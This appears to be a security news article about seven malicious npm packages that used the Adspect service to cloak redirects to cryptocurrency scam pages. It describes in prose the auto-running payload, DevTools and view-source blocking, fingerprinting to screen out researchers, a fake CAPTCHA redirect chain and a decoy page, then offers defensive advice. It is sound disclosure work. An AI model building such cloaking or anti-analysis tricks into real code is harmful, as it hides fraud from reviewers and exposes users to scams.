Researchers at Socket have identified seven malicious npm packages that weaponized the cloud-based traffic service Adspect to hide their behavior and redirect users to cryptocurrency scam websites. The incident illustrates how legitimate anti-bot and traffic-filtering tools can be repurposed as cloaking mechanisms in software supply chain attacks against the open-source ecosystem.
How Attackers Abused npm Packages and the Adspect Service
All seven packages were published on npm between September and November 2025 by a developer account using the alias dino_reborn (email: geneboo@proton[.]me). On the surface, these packages appeared to be typical web dependencies, increasing the likelihood that developers would install them as part of normal project work.
Adspect is marketed as a traffic-filtering and anti-bot platform designed to protect websites from automated abuse. In this campaign, it was used in the opposite way: as a cloaking tool to conceal malicious logic from security analysts and automated scanners, while selectively exposing the payload to real end users.
Six of the seven npm packages contained the core malicious JavaScript code. The seventh package, named signals-embed, functioned as a decoy component that built the initial web page from which the attack chain started.
Technical Analysis of the Malicious JavaScript Payload
Automatic Execution in the Browser via IIFE
The malicious payload consisted of roughly 39 KB of JavaScript wrapped in an IIFE (Immediately Invoked Function Expression). An IIFE is a function that executes as soon as it is defined. This design meant that as soon as a developer imported the package into a web application, the script would automatically run in the user’s browser without any explicit invocation in the application code.
Anti-analysis Techniques and DevTools Blocking
The code explicitly targeted security research and reverse engineering. It implemented several client-side protections:
- blocking the right-click context menu;
- disabling access to browser developer tools via F12;
- intercepting keyboard shortcuts such as Ctrl+U (view source) and Ctrl+Shift+I (DevTools);
- forcing a page reload if open DevTools were detected.
These techniques are common in phishing and fraud campaigns, where attackers aim to obstruct manual inspection and automated static or dynamic analysis of malicious pages.
Browser Fingerprinting and Victim Selection
In parallel, the script performed extensive browser fingerprinting to profile visitors. Among the collected attributes were:
- browser user agent string;
- language settings;
- protocol in use (HTTP or HTTPS);
- host domain and referrer;
- full URI and query parameters;
- character encoding and related metadata.
This data was sent to an attacker-controlled proxy server, while the real IP address of the user was forwarded to the Adspect API. Using this information, the attackers evaluated whether the visitor looked like a genuine potential victim or a security researcher, sandbox, or automated crawler.
Attack Flow: From Fake CAPTCHA to Crypto Scam
If the fingerprinting logic determined that the visitor was likely a real user, the script redirected the browser to a fake CAPTCHA page branded with cryptocurrency logos such as Ethereum or Solana. To most users, the page resembled a standard “I am not a robot” verification step.
Clicking through the CAPTCHA triggered a sequence that opened a new browser tab with a specially crafted Adspect URL. From there, Adspect redirected the victim to the cryptocurrency scam site. Because the navigation appeared to originate from a user interaction and a legitimate traffic service, it helped the attack bypass some browser protections and anti-fraud controls that look for automated or script-initiated redirects.
If the fingerprinting suspected a security tool or analyst, the script instead served a benign decoy page impersonating a company called Offlido. This reduced the likelihood that the campaign would be quickly detected, reported, and taken down.
Software Supply Chain Risks and npm Security Implications
This incident is another illustration of the growing threat of software supply chain attacks. Rather than compromising individual organizations one by one, adversaries increasingly plant malicious or backdoored packages in popular ecosystems such as npm, PyPI, and Maven, relying on developers’ trust in open-source repositories.
Industry reports, including Sonatype’s “State of the Software Supply Chain,” have documented a rapid increase in malicious and compromised open-source packages, numbering in the tens or even hundreds of thousands across ecosystems. This trend underscores that dependency security is no longer optional; it is a core part of application security programs.
Following Socket’s disclosure, all seven malicious packages were removed from the npm registry. However, the fact that they remained available for months highlights the limitations of registry-side controls and the need for stronger, layered defenses on the consumer side.
Practical Measures to Strengthen Open Source and npm Security
To reduce exposure to similar attacks, organizations and individual developers should treat third-party code with Zero Trust principles and adopt a set of concrete practices:
- Use software composition analysis (SCA) and specialized dependency scanners to detect known malicious or suspicious packages.
- Pin package versions with lock files (such as package-lock.json or yarn.lock) to avoid unexpected updates introducing malicious code.
- Conduct regular audits of dependencies, focusing on newly added or rarely used packages and anonymous or low-reputation publishers.
- Implement network egress controls so that front-end and back-end components cannot freely communicate with arbitrary domains or third-party APIs.
- Maintain a software bill of materials (SBOM) to gain visibility into all components used in applications and facilitate rapid response when a package is flagged.
As attackers continue to abuse legitimate services like Adspect and trusted ecosystems like npm, only a systematic, defense-in-depth approach to the software supply chain can prevent everyday dependencies from becoming covert delivery channels for malware and cryptocurrency scams. Prioritizing dependency hygiene, continuous monitoring, and strict validation of third-party code will significantly raise the cost of such campaigns for adversaries and reduce the risk of compromise for development teams.
